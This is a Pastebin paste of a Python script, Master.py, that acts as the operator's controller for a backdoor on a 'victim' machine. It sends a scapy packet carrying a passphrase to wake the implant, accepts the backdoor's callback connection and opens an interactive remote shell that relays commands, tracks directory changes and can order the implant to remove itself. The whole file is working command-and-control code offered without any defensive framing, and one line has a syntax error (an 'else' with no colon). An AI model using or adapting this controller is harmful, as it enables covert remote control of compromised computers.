Advertisement
WhichHat

Master.py

Mar 24th, 2017
459
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python3
  2. import sys
  3. import socket
  4. import logging
  5. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  6. from scapy.all import *
  7.  
  8.  
  9. prompt = ""
  10. username = ""
  11. sep = ""
  12.  
  13. gLHost = "" # local IP
  14. gRHost = "" # victim IP
  15. gLPort = -1 # local port number
  16. gRPort = -1 # requested victim port number
  17.  
  18.  
  19. gLHost = input("[?] Local Host IP : ")
  20. gLPort = int(input("[?] Local Port Number : "))
  21. gRHost = input("[?] Backdoor Host IP : ")
  22. gRPort = int(input("[?] Request Backdoor Port : "))
  23.  
  24.  
  25. def Request(lHost, lPort, rHost, rPort):
  26.     global prompt
  27.     global username
  28.     global sep
  29.     nbattempts = 3 # Let give it 3 attempts. If all fail just give up
  30.     while nbattempts > 0:
  31.         skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  32.         skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Reuse a socket even if it has been recently closed and is timing.
  33.         skt.settimeout(3) # Wait up to 3 sec on blocking method
  34.         skt.bind((lHost, lPort)) # open the socket
  35.         skt.listen(1) # only 1 connection accepted at the same time
  36.         # Emit a scapy TCP packet containing the appropriate passphrase in order to wake up the backdoor
  37.         send(IP(src=lHost, dst=rHost)/TCP(sport=lPort, dport=rPort, flags="A")/Raw(load="passphrase1"), verbose=0)
  38.         try:
  39.             conn, sender = skt.accept() # accept a incoming connection
  40.             addr = sender[0]
  41.             port = sender[1]
  42.             if addr == rHost or port == rPort: # check if the source is what we expect : The dest of a scapy packet
  43.                 break
  44.             else : # sth connected but it's not our backdoor
  45.                 skt.close()
  46.                 nbattempts -= 1
  47.                 print("[!] Warning : Received unauthorized connection request... Connection refused")
  48.         except socket.timeout: # accept() timed out
  49.             skt.close()
  50.             nbattempts -= 1
  51.             print("[-] Failure : No answer... retrying")
  52.    
  53.     try:
  54.         if nbattempts == 0: # 0 attempt left so failed to establish the connection with the backdoor
  55.             # maybe because there is no backdoor on the given host
  56.             # or the backdoor couldn't open the requested remote port
  57.             # or a proxy firewall the wakeup packets
  58.             # or too many unwanted connection on the given local port... that would be quite worring...
  59.             raise socket.timeout()
  60.         conn.sendall(b"passphrase2")
  61.         passphrase = conn.recv(1024)
  62.         while True:
  63.             if type(passphrase) == bytes:
  64.                 passphrase = passphrase.decode("utf-8")
  65.             if passphrase == "passphrase3":
  66.                 conn.sendall(b"Report")
  67.                 user=conn.recv(1024)
  68.                 if type(user) == bytes:
  69.                     user = user.decode("utf-8")
  70.                 conn.sendall(b"Location")
  71.                 location = conn.recv(1024)
  72.                 if type(location) == bytes:
  73.                     location = location.decode("utf-8")
  74.                 username = user[:len(user)-1]
  75.                 sep = user[len(user)-1]
  76.                 prompt = username+location+prompt
  77.                 print("[+] Success : connected")
  78.                 return skt, conn
  79.             else
  80.                 skt.close()
  81.                 conn.close()
  82.                 return None, None
  83.     except socket.timeout:
  84.         skt.close()
  85.         print("[-] Failure : No answer from the backdoor")
  86.         return None, None
  87.     except (KeyboardInterrupt, SystemExit):
  88.         skt.close()
  89.         print("[-] Failure : User keyboard interruption")
  90.         return None, None
  91.  
  92.  
  93. def SendCommand(conn, command):
  94.     conn.sendall(str.encode(command))
  95.     res = conn.recv(65535)
  96.     if type(res) == bytes:
  97.         res = res.decode("utf-8")
  98.     return res
  99.    
  100. def ConnectBackdoor(lHost, lPort, rHost, rPort):
  101.     global prompt, username, sep
  102.     skt, conn = Request(lHost, lPort, rHost, rPort)
  103.     if skt != None and conn != None:
  104.         try:
  105.             while True:
  106.                 command = input(prompt+" ")
  107.                 if command != "":
  108.                     output = SendCommand(conn, command)
  109.                     if command.split()[0] == "cd":
  110.                         if len(output.split()) == 1:
  111.                             prompt = username+output+sep
  112.                         else:
  113.                             print(output)
  114.                     elif output.lower() == "exited":
  115.                         print("Success : Backdoor closed")
  116.                         break
  117.                     elif output.lower() == "released":
  118.                         print("Success : Backdoor removed")
  119.                         break
  120.                     else:
  121.                         if output.lower() != "daemonnoreport": # message sent by the backdoor when the command return no result to avoid troublesome packet padding
  122.                             print(output)
  123.                 else:
  124.                     continue
  125.         except (KeyboardInterrupt, SystemExit):
  126.             output = SendCommand(conn, "exit") # Send automatic exit command on error to prevent the backdoor being locked
  127.             if output.lower() == "exited":
  128.                 print("Success : Done")
  129.         except Exception as err:
  130.             print(err.args)
  131.             print("[-] Error : Something went wrong :'(") # Send automatic exit command on error to prevent the backdoor being locked
  132.             output = SendCommand(conn, "exit")
  133.             if output.lower() == "exited":
  134.                 print("Success : Backdoor closed")
  135.         finally:
  136.             conn.close()
  137.             skt.close()
  138.            
  139.  
  140. ConnectBackdoor(gLHost, gLPort, gRHost, gRPort)
Advertisement
RAW Paste Data Copied
Advertisement